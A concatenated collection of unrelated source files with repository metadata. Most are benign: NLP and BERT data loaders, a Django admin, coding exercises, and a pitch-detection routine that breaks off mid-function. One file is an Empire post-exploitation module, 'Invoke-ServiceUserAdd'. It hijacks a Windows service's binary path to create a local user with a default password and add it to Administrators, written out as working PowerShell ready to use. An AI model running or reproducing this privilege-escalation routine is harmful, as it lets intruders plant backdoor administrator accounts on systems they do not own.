print ("WARNING: Input model name '%s' is not registered..." % name)
print ("WARNING: Please register the name in model_util.registered_models...")
return None
model_path = str(os.path.join(pkg_path, "segment/models/", name, "crf_model"))
if os.path.exists(model_path):
print ("NOTICE: Loading model from below path %s..." % model_path)
return Tokenizer(model_path)
else:
print ("WARNING: Input model path %s doesn't exist ..." % model_path)
print ("WARNING: Please download model file using method: deepnlp.download(module='%s', name='%s')" % ('segment', name))
print ("WARNING: Loading default model %s..." % DEFAULT_MODEL)
return Tokenizer(DEFAULT_MODEL)
def load_user_model(model_path):
''' model_path e.g.: ./segment/models/zh/crf_model
'''
if os.path.exists(model_path):
print ("NOTICE: Loading model from below path %s..." % model_path)
return Tokenizer(model_path)
else:
print ("WARNING: Input model path %s doesn't exist, please download model file using deepnlp.download() method" % name)
print ("WARNING: Loading default model %s..." % DEFAULT_MODEL)
return Tokenizer(DEFAULT_MODEL)
|
[
"dingo0927@126.com"
] |
dingo0927@126.com
|
7007b978bc359c69f951596544dccbf0805e60a6
|
bfbdbb98f7d81a67fb31ef0c50d97e469a08e7c6
|
/youcook2_object_detection.py
|
68fd4206eb6065539d6a8ddeeb32b42d184b94d8
|
[] |
no_license
|
carinasilberer/cooking-procedural-extraction
|
063c758e45c75b56c0dc6be7c3db5fdd5863a3c8
|
9f2f6d841e02e62a0e66227ffb8c0ca188ec0d17
|
refs/heads/master
| 2022-05-29T02:39:02.209343
| 2020-05-02T00:49:22
| 2020-05-02T00:49:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,008
|
py
|
import csv
import json
youtube_ids = set()
with open("youcook2/reviewed_0812.csv", newline='', encoding='utf-8') as gt_f:
reader = csv.DictReader(gt_f)
for row in reader:
youtube_id = row['VideoUrl'].split('?v=')[1]
youtube_ids.add(youtube_id)
with open("youcook2/youtube_ids.txt", 'w', encoding='utf-8') as id_f:
for idx in youtube_ids:
id_f.write(idx+"\n")
total_ids = len(youtube_ids)
print("Total vids: ", total_ids)
val_count = 0
with open("youcook2/yc2_bb/yc2_bb_val_annotations.json", encoding="utf-8") as val_f:
vals = json.load(val_f)
for k in vals["database"]:
if k in youtube_ids:
val_count += 1
print("Val in ours: ", val_count)
test_count = 0
with open("youcook2/yc2_bb/yc2_bb_public_test_annotations.json", encoding="utf-8") as test_f:
tests = json.load(test_f)
for k in tests["database"]:
if k in youtube_ids:
test_count += 1
print("Test in ours: ", test_count)
|
[
"frankxu2004@gmail.com"
] |
frankxu2004@gmail.com
|
b577c919bd24c36261d64999050c5fc6ea965dd9
|
bcdc23c9d3cc89279c57faaa59b9b63596edbbc8
|
/day9/sol2.py
|
b99a29b151c3b2a7af8fdf639b20e9886eb744bd
|
[] |
no_license
|
AntoineTheb/adventofcode2020
|
f6924db4537fd3cddf16737664ddf74a4e8bfba8
|
223622438f15828b26996591e9298948ce069b2e
|
refs/heads/master
| 2023-02-04T06:14:13.535984
| 2020-12-22T01:27:38
| 2020-12-22T01:27:38
| 322,895,128
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,022
|
py
|
from itertools import combinations
import numpy as np
def main():
data = np.loadtxt('input.txt', dtype=np.int)
valid = True
pre_beg = 0
pre_end = 25
while valid:
preample = data[pre_beg:pre_end]
is_valid = False
for one, two in combinations(preample, 2):
if one + two == data[pre_end]:
is_valid = True
break
valid = is_valid
pre_beg += 1
pre_end += 1
weakness = data[pre_end-1]
print('Found weakness: {}'.format(weakness))
print('Generating sublists ..')
# from https://stackoverflow.com/a/47101915
def all_sublists(L):
for w in range(1, len(L)+1):
for i in range(len(L)-w+1):
yield L[i:i+w]
print('Got sublists ..')
print('Verifying additions')
for sub in all_sublists(data[:pre_end-1]):
# print(sub, end="\r")
if sum(sub) == weakness:
print(min(sub) + max(sub))
if __name__ == "__main__":
main()
|
[
"theberge.antoine.cem@gmail.com"
] |
theberge.antoine.cem@gmail.com
|
57130ac2be6a80dc5a76960b28cfb18ecdd11fed
|
ef6de6fd1d4e8e9858aecb287dd23dc520aec136
|
/physlearn/supervised/interface.py
|
e000cadbcfddf4ea806c973e3078d20cf8a1fc9e
|
[
"MIT"
] |
permissive
|
tesseract-42/scikit-physlearn
|
bd625b1d1d7b2cfaed6ba3a586def97e5bb1bd99
|
80410feafb27f99f417b2b5d2282ebbb8fdbb642
|
refs/heads/master
| 2022-12-18T11:04:16.122912
| 2020-09-27T12:59:34
| 2020-09-27T12:59:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,605
|
py
|
"""
The :mod:`physlearn.supervised.interface` provides an interface object, which
abstracts regressors and enables their amalgamation into a unified regressor
object. It includes the :class:`physlearn.RegressorDictionaryInterface` class.
"""
# Author: Alex Wozniakowski
# License: MIT
import os
import joblib
import mlxtend.regressor
import sklearn.ensemble
from physlearn.base import AbstractEstimatorDictionaryInterface
from physlearn.supervised.utils._definition import _REGRESSOR_DICT
class RegressorDictionaryInterface(AbstractEstimatorDictionaryInterface):
"""BaseRegressor and regressor dictionary interface.
This interface enables the regressor abstraction, which amalgamates
regressors from
`Scikit-learn <https://scikit-learn.org/>`_,
`LightGBM <https://lightgbm.readthedocs.io/en/latest/index.html>`_,
`XGBoost <https://xgboost.readthedocs.io/en/latest/>`_,
`CatBoost <https://catboost.ai/>`_,
and `Mlxtend <http://rasbt.github.io/mlxtend/>`_ into a unified framework.
It links the :class:`physlearn.supervised.regression.BaseRegressor` and
the regressor dictionary, which contains the regressor classes.
Parameters
----------
regressor_choice : str
The dictionary key for lookup in the dictionary of regressors.
The key must be in lower case letter, e.g., the Scikit-learn
regressor Ridge has key ``'ridge'``.
params : dict, list, or None, optional (default=None)
The choice of (hyper)parameters.
stacking_options : dict or None, optional (default=None)
A dictionary of stacking options, whereby ``layers``
must be specified:
layers :obj:`dict`
A dictionary of stacking layer(s).
shuffle :obj:`bool` or None, (default=True)
Determines whether to shuffle the training data in
:class:`mlxtend.regressor.StackingCVRegressor`.
refit :obj:`bool` or None, (default=True)
Determines whether to clone and refit the regressors in
:class:`mlxtend.regressor.StackingCVRegressor`.
passthrough :obj:`bool` or None, (default=True)
Determines whether to concatenate the original features with
the first stacking layer predictions in
:class:`sklearn.ensemble.StackingRegressor`,
:class:`mlxtend.regressor.StackingRegressor`, or
:class:`mlxtend.regressor.StackingCVRegressor`.
meta_features : :obj:`bool` or None, (default=True)
Determines whether to make the concatenated features
accessible through the attribute ``train_meta_features_``
in :class:`mlxtend.regressor.StackingRegressor` and
:class:`mlxtend.regressor.StackingCVRegressor`.
voting_weights : :obj:`ndarray` of shape (n_regressors,) or None, (default=None)
Sequence of weights for :class:`sklearn.ensemble.VotingRegressor`.
"""
def __init__(self, regressor_choice: str, params=None,
stacking_options=None):
self.regressor_choice = regressor_choice
self.params = params
self.stacking_options = stacking_options
def get_params(self, regressor):
"""
Retrieves the (hyper)parameters.
Parameters
----------
regressor : estimator
A regressor that follows the Scikit-learn API.
Notes
-----
The method :meth:`physlearn.RegressorDictionaryInterface.set_params`
must be called beforehand.
"""
if not hasattr(self, '_set_params'):
raise AttributeError('In order to retrieve the (hyper)parameters '
'call set_params beforehand.')
else:
return regressor.get_params()
def set_params(self, **kwargs):
"""Sets the (hyper)parameters.
If ``params`` is ``None``, then the default (hyper)parameters
are utilized.
Parameters
----------
cv : int, cross-validation generator, an iterable, or None
Determines the cross-validation strategy in
:class:`sklearn.ensemble.StackingRegressor`,
:class:`mlxtend.regressor.StackingRegressor`, or
:class:`mlxtend.regressor.StackingCVRegressor`.
verbose : int or None
Determines verbosity in
:class:`mlxtend.regressor.StackingRegressor` and
:class:`mlxtend.regressor.StackingCVRegressor`.
random_state : int, RandomState instance, or None
Determines the random number generation in
:class:`mlxtend.regressor.StackingCVRegressor`.
n_jobs : int or None
The number of jobs to run in parallel.
stacking_options : dict or None, optional (default=None)
A dictionary of stacking options, whereby ``layers``
must be specified:
layers :obj:`dict`
A dictionary of stacking layer(s).
shuffle :obj:`bool` or None, (default=True)
Determines whether to shuffle the training data in
:class:`mlxtend.regressor.StackingCVRegressor`.
refit :obj:`bool` or None, (default=True)
Determines whether to clone and refit the regressors in
:class:`mlxtend.regressor.StackingCVRegressor`.
passthrough :obj:`bool` or None, (default=True)
Determines whether to concatenate the original features with
the first stacking layer predictions in
:class:`sklearn.ensemble.StackingRegressor`,
:class:`mlxtend.regressor.StackingRegressor`, or
:class:`mlxtend.regressor.StackingCVRegressor`.
meta_features : :obj:`bool` or None, (default=True)
Determines whether to make the concatenated features
accessible through the attribute ``train_meta_features_``
in :class:`mlxtend.regressor.StackingRegressor` and
:class:`mlxtend.regressor.StackingCVRegressor`.
voting_weights : :obj:`ndarray` of shape (n_regressors,) or None, (default=None)
Sequence of weights for :class:`sklearn.ensemble.VotingRegressor`.
"""
cv = kwargs.pop('cv', None)
verbose = kwargs.pop('verbose', None)
random_state = kwargs.pop('random_state', None)
n_jobs = kwargs.pop('n_jobs', None)
stacking_options = kwargs.pop('stacking_options', None)
if isinstance(stacking_options, dict):
# Check if the user specified the
# various stacking options and set
# the default behavior if unspecified.
if 'layers' not in stacking_options:
raise KeyError('The layers key is necessary for stacking. '
'Without its specification the stacking '
'layers are ambiguous.')
else:
layers = stacking_options['layers']
if 'shuffle' in stacking_options:
shuffle = stacking_options['shuffle']
else:
shuffle = True
if 'refit' in stacking_options:
refit = stacking_options['refit']
else:
refit = True
if 'passthrough' in stacking_options:
passthrough = stacking_options['passthrough']
else:
passthrough = True
if 'meta_features' in stacking_options:
meta_features = stacking_options['meta_features']
else:
meta_features = True
if 'voting_weights' in stacking_options:
voting_weights = stacking_options['voting_weights']
else:
voting_weights = None
if kwargs:
raise TypeError('Unknown keyword arguments: %s'
% (list(kwargs.keys())[0]))
reg = {}
if self.params is not None:
if self.stacking_options is not None:
if any(self.regressor_choice == choice for choice in ['stackingregressor', 'votingregressor']):
reg['regressors'] = [(str(index), _REGRESSOR_DICT[choice]().set_params(
**self.params[0][index]))
for index, choice
in enumerate(layers['regressors'])]
else:
reg['regressors'] = [_REGRESSOR_DICT[choice]().set_params(
**self.params[0][index])
for index, choice
in enumerate(layers['regressors'])]
if self.regressor_choice != 'votingregressor':
reg['final_regressor'] = _REGRESSOR_DICT[layers['final_regressor']]().set_params(
**self.params[1])
else:
reg['regressor'] = _REGRESSOR_DICT[self.regressor_choice]().set_params(**self.params)
else:
# Retrieve default (hyper)parameters.
if self.stacking_options is not None:
if any(self.regressor_choice == choice for choice in ['stackingregressor', 'votingregressor']):
reg['regressors'] = [(str(index), _REGRESSOR_DICT[choice]())
for index, choice
in enumerate(layers['regressors'])]
else:
reg['regressors'] = [_REGRESSOR_DICT[choice]()
for choice
in layers['regressors']]
if self.regressor_choice != 'votingregressor':
reg['final_regressor'] = _REGRESSOR_DICT[layers['final_regressor']]()
else:
reg['regressor'] = _REGRESSOR_DICT[self.regressor_choice]()
if 'regressor' in reg:
out = reg['regressor']
elif 'regressors' in reg:
if 'final_regressor' in reg:
if self.regressor_choice == 'stackingregressor':
out = sklearn.ensemble.StackingRegressor(estimators=reg['regressors'],
final_estimator=reg['final_regressor'],
cv=cv,
n_jobs=n_jobs,
passthrough=passthrough)
elif self.regressor_choice == 'mlxtendstackingregressor':
out = mlxtend.regressor.StackingRegressor(regressors=reg['regressors'],
meta_regressor=reg['final_regressor'],
verbose=verbose,
use_features_in_secondary=passthrough,
store_train_meta_features=meta_features)
elif self.regressor_choice == 'mlxtendstackingcvregressor':
out = mlxtend.regressor.StackingCVRegressor(regressors=reg['regressors'],
meta_regressor=reg['final_regressor'],
cv=cv,
shuffle=shuffle,
random_state=random_state,
verbose=verbose,
refit=refit,
n_jobs=n_jobs,
use_features_in_secondary=passthrough,
store_train_meta_features=meta_features)
else:
out = sklearn.ensemble.VotingRegressor(estimators=reg['regressors'],
weights=voting_weights,
n_jobs=n_jobs)
# This attribute is used in get_params to check
# if the (hyper)parameters have been set.
setattr(self, '_set_params', True)
return out
|
[
"wozn0001@e.ntu.edu.sg"
] |
wozn0001@e.ntu.edu.sg
|
6abbb912609a4b40bca9c48212659992ea448350
|
53f2a72afe6b638b2beea94f5514be8ab3921ee4
|
/env/bin/pip2.7
|
c72c1435b048e2baf6318281b1849115e25b81c1
|
[] |
no_license
|
bipinkh/FSUelectionManagementSystem
|
576336f2fbff46e137bd7ff76fe8df17c19fd9a9
|
013ac5f7f7475656876b471a52704d76f1d13d2b
|
refs/heads/master
| 2021-01-01T15:49:00.204030
| 2018-07-07T17:25:56
| 2018-07-07T17:25:56
| 97,708,797
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 272
|
7
|
#!/media/basanta/main/academics/FSUelectionManagementSystem/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"basanta83chaulagain@gmail.com"
] |
basanta83chaulagain@gmail.com
|
6adb6bf821f03dd5f10e7a2d72a0e6ad7598d8af
|
dbfbca14923d64eaa4b20ab13d3cda10db058047
|
/account/admin.py
|
dd0023d7dec4bab4a8a7005abf4e21cc974944fc
|
[] |
no_license
|
JoaoAlmeida-dev/quarantine
|
bb9c0c2d32d5bc33a5b1578e0f76c00f047a2641
|
f6b085cad409f31d0e73a3cdb75b90fcec2bfd19
|
refs/heads/master
| 2022-07-05T09:08:03.528702
| 2020-05-14T22:08:37
| 2020-05-14T22:08:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from account.models import Account
# Register your models here.
class Accountadmin(UserAdmin):
list_display = ('email', 'username', 'date_joined', 'last_login', 'is_admin', 'is_staff')
search_fields = ('email', 'username')
readonly_fields = ('date_joined', 'last_login',)
filter_horizontal = ()
list_filter = ()
fieldsets = ()
admin.site.register(Account,Accountadmin)
|
[
"joao.ranger@gmail.com"
] |
joao.ranger@gmail.com
|
73f13181b3902224a6140ced6570792c42d580fe
|
80b6c944728ca61ddc477fa2bb9fa312e1c4c81d
|
/data_iterator.py
|
f663d0bdf8e2cf234139f572bb319a8613b16c98
|
[] |
no_license
|
LiveTowardTheSea/bert_model
|
c2f480cf4bdbec10ad7830584ca2d84f90345082
|
8ce207a8319bf53e064dacb7d574ff8f912e863a
|
refs/heads/master
| 2023-04-28T06:15:13.337520
| 2021-05-20T13:44:26
| 2021-05-20T13:44:26
| 369,202,848
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,040
|
py
|
#from numpy.lib.npyio import NpzFile
import torch
import codecs
# 迭代器功能:根据dataset、vocab 每次生成 (batch_size,seq_len)的torch数据,形成对于数据集的便利
import numpy as np
from transformers import BertTokenizer
def generate_char_idx(batch_data, vocab):
"""
这个是针对于 char 来说的,因为是只提取了单个的token
:param batch_data: series类型的数据,有两列,要么是 sentence,要么是 label
:param vocab: sentence 或者是label 的 vocab
:return: idx 列表
"""
idx = []
for sentence in batch_data:
each_idx = []
for token in sentence:
each_idx.append(vocab.stoi[token])
idx.append(each_idx)
return idx
def generate_pad_idx(idx_list, vocab):
"""
经过上一个函数处理之后,我们可以把 token变为一系列的 idx,形成一个包含列表的列表,现在我们要做的就是
把这个列表的列表变成tensor,并且补齐。
:param idx_list:
:param vocab: 进行补齐的vocab,里面含有vocab.pad
:return: 返回 torch.tensor 以及 mask,根据pad
"""
max_len = max([len(each_idx_list) for each_idx_list in idx_list])
result = torch.zeros((len(idx_list), max_len), dtype=torch.long)
for i, sentence in enumerate(idx_list):
result[i] = torch.tensor(sentence + [vocab.pad_idx]*(max_len - len(sentence)), dtype=torch.long)
mask = (result == vocab.pad_idx)
return result, mask
def read_data(data_path):
data_list = []
with codecs.open(data_path, 'r', 'utf-8') as f:
sentence_list = []
tag_list = []
for line in f.readlines():
if line not in ['\n', '\r\n']:
word_label = line.strip().split()
if len(word_label) >= 2:
sentence_list.append(word_label[0])
tag_list.append(word_label[1])
else:
if len(sentence_list)>0 and len(tag_list)>0 and len(sentence_list)==len(tag_list):
data_list.append((sentence_list, tag_list))
sentence_list = []
tag_list = []
return data_list
class data_iterator:
def __init__(self, data_path,char_vocab, tag_vocab, batch_size):
print("init iterator:", data_path)
self.data_list = read_data(data_path)
self.char_vocab = char_vocab
self.tag_vocab = tag_vocab
self.batch_size = batch_size
self.offset = 0
self.max_num = len(self.data_list) // batch_size + 1 if len(self.data_list) % batch_size != 0 else len(self.data_list) // batch_size
# 调用桶排序算法
self.appro_bucket_sort()
# 接下来,根据batch_size,将模型数据打乱,使长度相近的凑在一个batch里,不同batch间长度不同。
self.between_bucket_unsort()
# 对于data_list,我们对其进行大致的桶排序,使其长度接近的大致靠在一起,减少pad,减少处理时间
def appro_bucket_sort(self):
"""
根据元素长度进行大致的桶排序
:param sent_tag_list 数据列表,每一个元素为包含句子和标签的元组
"""
# 首先,将每一个句子的长度放入列表中
gap_len = 32
length_list = []
for sent,tag in self.data_list:
length_list.append(len(sent))
# 接下来,拿到当前句子长度的最大值和最小值。
max_bucket_num = max(length_list) // gap_len
min_bucket_num = min(length_list) // gap_len
# 总共有多少个桶
total_bucket = max_bucket_num - min_bucket_num + 1
# 每一个桶中存放句子编号
sentence_2_bucket = [[] for i in range(total_bucket)]
for i,sent_len in enumerate(length_list):
# 存放在哪个桶中,获得列表编号
bucket_idx = sent_len // gap_len - min_bucket_num
sentence_2_bucket[bucket_idx].append(i)
# 首先,拉平sentence_2_idx
sentence_2_bucket = [sent_idx for bucket in sentence_2_bucket for sent_idx in bucket]
# 按照 sentence_2_bucket 的顺序,我们重新组织一下sent_tag_list
orig_2_bucket= [sentence_2_bucket.index(orig_idx) for orig_idx in range(len(self.data_list))]
new_sentence_tag_list = [x for _,x in sorted(zip(orig_2_bucket,self.data_list))]
self.data_list = new_sentence_tag_list
# 经过上面这个函数的处理,我们把句子长度相近的靠在了一起
# 但如果这样,模型在开始训练时,使用短句子,后面就使用长句子,这显然是不行的。
def between_bucket_unsort(self):
data_len = len(self.data_list)
# 存放在第i位的是 原来数据 所处于的 batch_idx
new_batch_idx = np.arange(0, (data_len-1)//self.batch_size + 1)
np.random.shuffle(new_batch_idx)
new_data_list = []
for batch_idx in new_batch_idx:
end_pos = min((batch_idx+1) * self.batch_size,data_len)
new_data_list += self.data_list[batch_idx * self.batch_size: end_pos]
self.data_list = new_data_list
def reset_iter(self):
self.offset = 0
# 重新洗一下数据
np.random.shuffle(self.data_list)
# 重新 bucket
self.appro_bucket_sort()
# 重新乱序
self.between_bucket_unsort()
def next(self):
if self.offset == self.max_num:
raise StopIteration
next_idx = (self.offset + 1) * self.batch_size if self.offset != self.max_num - 1 else len(self.data_list)
sentence_tag_data = self.data_list[self.offset * self.batch_size: next_idx]
self.offset += 1
sentence_data = []
tag_data = []
for sentence, tag in sentence_tag_data:
sentence_data.append(''.join(sentence))
tag_data.append(tag)
# sentence_data 为 list of str
sentence_tensor = []
sentence_mask = []
max_pad_len = len(max(sentence_data, key=len, default=''))+2
for sent in sentence_data:
encoded_result = self.char_vocab.encode_plus(sent,add_special_tokens=True,
max_length=max_pad_len,pad_to_max_length=True,return_attention_mask=True,return_tensors='pt')
#print(self.char_vocab.tokenize(sent))
#print('Token IDs: ', self.char_vocab.convert_tokens_to_ids(self.char_vocab.tokenize(sent)))
sent_tensor = encoded_result['input_ids']
sent_mask = encoded_result['attention_mask']
sentence_tensor.append(sent_tensor)
sentence_mask.append(sent_mask)
sentence_tensor = torch.cat(sentence_tensor,dim=0)
sentence_mask = torch.cat(sentence_mask,dim=0)
tag_idx = generate_char_idx(tag_data, self.tag_vocab)
tag_tensor, tag_mask = generate_pad_idx(tag_idx, self.tag_vocab)
return sentence_tensor, sentence_mask, tag_tensor, tag_mask
|
[
"3430582102@qq.com"
] |
3430582102@qq.com
|
6fce633f50677744167793b8f644b51c2f9d85b2
|
7d30d345759a6ec70b4181a7f9dc112397d3d3ad
|
/Problem Set 3/radiationExposure.py
|
a9088794e79665a564cf34f974a2959225f682b9
|
[] |
no_license
|
harmishlakhani/MITx-6.00.1x
|
9ac22c9a4443ce5eda6c94ab7f1e4f92bbfb3338
|
9ed1aa3b975e699615ad361e56cadef6ee66c05a
|
refs/heads/master
| 2021-01-24T06:31:04.275872
| 2015-07-01T14:24:40
| 2015-07-01T14:24:40
| 37,739,841
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 920
|
py
|
def radiationExposure(start, stop, step):
'''
Computes and returns the amount of radiation exposed
to between the start and stop times. Calls the
function f (defined for you in the grading script)
to obtain the value of the function at any point.
start: integer, the time at which exposure begins
stop: integer, the time at which exposure ends
step: float, the width of each rectangle. You can assume that
the step size will always partition the space evenly.
returns: float, the amount of radiation exposed to
between start and stop times.
'''
# FILL IN YOUR CODE HERE...
radExposed = 0
i = start
while i < stop:
radExposed = radExposed + (step * f(i))
i = i + step
return radExposed
def f(x):
import math
return 10*math.e**(math.log(0.5)/5.27 * x)
print radiationExposure(0, 5, 1)
|
[
"harmish.lakhani@gmail.com"
] |
harmish.lakhani@gmail.com
|
ad885a14bf054f0d4dc5d81e3cf1a2ed65c53263
|
fe3ecb9b1ddd8de17b8cc93209134f86cd9c4a6f
|
/3_Python/chap01_Basic/exams/exam02_2.py
|
787636d74c46ed833bca1e20bf8f70046918b125
|
[] |
no_license
|
nsh92/Bigdata-and-Machine-Learning-Education-at-ITWILL
|
d1a7292ee4865a3d0c664dd6ecf3afc0d6325847
|
3cb5661001597499178a2c85f4ccf70dcf0855d6
|
refs/heads/master
| 2022-11-21T23:10:51.421708
| 2020-07-23T12:49:11
| 2020-07-23T12:49:11
| 275,540,204
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 433
|
py
|
'''
step02 문제
'''
'''
문2) 화씨를 섭씨로 변환하는 프로그램을 작성하시오.
화씨온도 변수명 : ftemp
섭씨온도 변수명 : ctemp
온도변환 수식 = (화씨온도 - 32.0) * (5.0/9.0)
<<화면출력 결과>>
화씨온도 : 93
섭씨온도 = 33.888889
'''
ftemp = 93
ctemp = (ftemp - 32.0) * (5.0/9.0)
print("화씨온도 :", ftemp)
print("섭씨온도 =", format(ctemp, "2.6f"))
|
[
"totols1092@gmail.com"
] |
totols1092@gmail.com
|
c65d3b132fdaa6cb8659c14abd5137a8b32c7c77
|
de697c595e68366e6fe9e6ae3ae150f354b8c250
|
/lib/modules/privesc/powerup/service_useradd.py
|
6cd6c686f8c7d7019afd2556810e49ab6b81fde6
|
[
"BSD-3-Clause"
] |
permissive
|
lockfale/Empire
|
b0515d5752d75e89870c9f735acd2aa6a86d3245
|
db1bc92296de4278b53df4129485cd9613332163
|
refs/heads/master
| 2021-01-16T19:22:35.456787
| 2015-08-09T05:58:05
| 2015-08-09T05:58:05
| 40,453,928
| 2
| 1
| null | 2015-08-09T23:21:09
| 2015-08-09T23:21:09
| null |
UTF-8
|
Python
| false
| false
| 8,575
|
py
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-ServiceUserAdd',
'Author': ['@harmj0y'],
'Description': ("Modifies a target service to create a local user and add it "
"to the local administrators."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/Veil-Framework/PowerTools/tree/master/PowerUp'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'ServiceName' : {
'Description' : "The service name to manipulate.",
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : "The username to add.",
'Required' : False,
'Value' : 'john'
},
'Password' : {
'Description' : "Password to set for the added user.",
'Required' : False,
'Value' : 'Password123!'
},
'GroupName' : {
'Description' : "Local group to add the user to.",
'Required' : False,
'Value' : 'Administrators'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
script = """
function Invoke-ServiceUserAdd {
<#
.SYNOPSIS
Modifies a target service to create a local user and add it
to the local administrators.
.DESCRIPTION
This function stops a service, modifies it to create a user, starts
the service, stops it, modifies it to add the user to the specified group,
stops it, and then restores the original EXE path.
.PARAMETER ServiceName
The service name to manipulate. Required.
.PARAMETER UserName
The username to add. If not given, it defaults to "john"
.PARAMETER Password
The password to set for the added user. If not given, it defaults to "Password123!"
.PARAMETER GroupName
Group to add the user to (default of Administrators)
.OUTPUTS
System.bool. The user/password created if successful, false otherwise.
.EXAMPLE
> Invoke-ServiceUserAdd -ServiceName VulnSVC
Abuses service 'VulnSVC' to add a localuser "john" with password
"Password123! to the machine and local administrator group
.EXAMPLE
> Invoke-ServiceUserAdd -ServiceName VulnSVC -UserName backdoor -Password password -GroupName "Power Users"
Abuses service 'VulnSVC' to add a localuser "backdoor" with password
"password" to the machine and local "Power Users" group
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)] [string]$ServiceName,
[string]$UserName = "john",
[string]$Password = "Password123!",
[string]$GroupName = "Administrators"
)
# query WMI for the service
$TargetService = gwmi win32_service -Filter "Name='$ServiceName'" | ?{$_}
# make sure we got a result back
if ($TargetService){
try{
# try to enable the service it was it was disabled
$RestoreDisabled = $false
if ($TargetService.StartMode -eq "Disabled"){
Write-Verbose "Service '$ServiceName' disabled, enabling..."
$result = sc.exe config $($TargetService.Name) start= demand
if ($result -contains "Access is denied."){
Write-Warning "[!] Access to service $($TargetService.Name) denied"
return $false
}
$RestoreDisabled = $true
}
# extract the original path and state so we can restore it later
$OriginalPath = $TargetService.PathName
$OriginalState = $TargetService.State
Write-Verbose "Service '$ServiceName' original path: '$OriginalPath'"
Write-Verbose "Service '$ServiceName' original state: '$OriginalState'"
Write-Verbose "Adding user '$UserName'"
# stop the service
$result = sc.exe stop $($TargetService.Name)
if ($result -contains "Access is denied."){
Write-Warning "[!] Access to service $($TargetService.Name) denied"
return $false
}
# modify the service path to add a user
$UserAddCommand = "net user $UserName $Password /add"
# change the path name to the user add command- if sc config doesn't error out here,
# it shouldn't later on
$result = sc.exe config $($TargetService.Name) binPath= $UserAddCommand
if ($result -contains "Access is denied."){
Write-Warning "[!] Access to service $($TargetService.Name) denied"
return $false
}
# start the service and breath
$result = sc.exe start $($TargetService.Name)
Start-Sleep -s 1
Write-Verbose "Adding user '$UserName' to group '$GroupName'"
# stop the service
$result = sc.exe stop $($TargetService.Name)
Start-Sleep -s 1
# modify the service path to add the user to the specified local group
$GroupAddCommand = "net localgroup $GroupName $UserName /add"
# change the path name to the group add command
$result = sc.exe config $($TargetService.Name) binPath= $GroupAddCommand
# start the service and breath
$result = sc.exe start $($TargetService.Name)
Start-Sleep -s 1
Write-Verbose "Restoring original path to service '$ServiceName'"
# stop the service
$result = sc.exe stop $($TargetService.Name)
Start-Sleep -s 1
# restore the original binary path
$result = sc.exe config $($TargetService.Name) binPath= $OriginalPath
# try to restore the service to whatever state it was
if ($RestoreDisabled){
Write-Verbose "Re-disabling service '$ServiceName'"
$result = sc.exe config $($TargetService.Name) start= disbaled
}
elseif ($OriginalState -eq "Paused"){
Write-Verbose "Starting and then pausing service '$ServiceName'"
$result = sc.exe start $($TargetService.Name)
Start-Sleep -s .5
$result = sc.exe pause $($TargetService.Name)
}
elseif ($OriginalState -eq "Stopped"){
Write-Verbose "Leaving service '$ServiceName' in stopped state"
}
else{
Write-Verbose "Starting service '$ServiceName'"
$result = sc.exe start $($TargetService.Name)
}
"[+] User '$UserName' created with password '$Password' and added to localgroup '$GroupName'"
}
catch{
Write-Warning "Error while modifying service '$ServiceName': $_"
$false
}
}
else{
Write-Warning "Target service '$ServiceName' not found on the machine"
$false
}
} Invoke-ServiceUserAdd"""
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
return script
|
[
"will@harmj0y.net"
] |
will@harmj0y.net
|
5b5134d7c642c9e9564c16bed4747780a807ce99
|
d38579c656f76a9f021eccd6e5943d4ce097ac9d
|
/pyrevoice/yin.py
|
b4d74246edc7c17c4442db1195a4cb7c14fe648e
|
[
"MIT"
] |
permissive
|
tuxzz/revoice_core
|
d821cd2eb929a79abac3ff9a330e3101ad56b5ea
|
1f2487f16d9a0d9ffa8bb0ae6e0cd93781ed297a
|
refs/heads/master
| 2019-07-15T08:27:26.937116
| 2017-11-04T07:19:41
| 2017-11-04T07:19:41
| 84,322,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,561
|
py
|
import numpy as np
import numba as nb
from .common import *
def difference(x):
frameSize = len(x)
paddedSize = roundUpToPowerOf2(frameSize)
outSize = frameSize // 2
out = np.zeros(outSize, dtype = np.float64)
# POWER TERM CALCULATION
# ... for the power terms in equation (7) in the Yin paper
powerTerms = np.zeros(outSize, dtype = np.float64)
powerTerms[0] = np.sum(x[:outSize] ** 2)
for i in range(1, outSize):
powerTerms[i] = powerTerms[i - 1] - x[i - 1] * x[i - 1] + x[i + outSize] * x [i + outSize]
# YIN-STYLE ACF via FFT
# 1. data
transformedAudio = np.fft.rfft(x, n = paddedSize)
# 2. half of the data, disguised as a convolution kernel
kernel = x[:outSize][::-1]
transformedKernel = np.fft.rfft(kernel, n = paddedSize)
# 3. convolution
yinStyleACF = transformedAudio * transformedKernel
correlation = np.fft.irfft(yinStyleACF)
# CALCULATION OF difference function
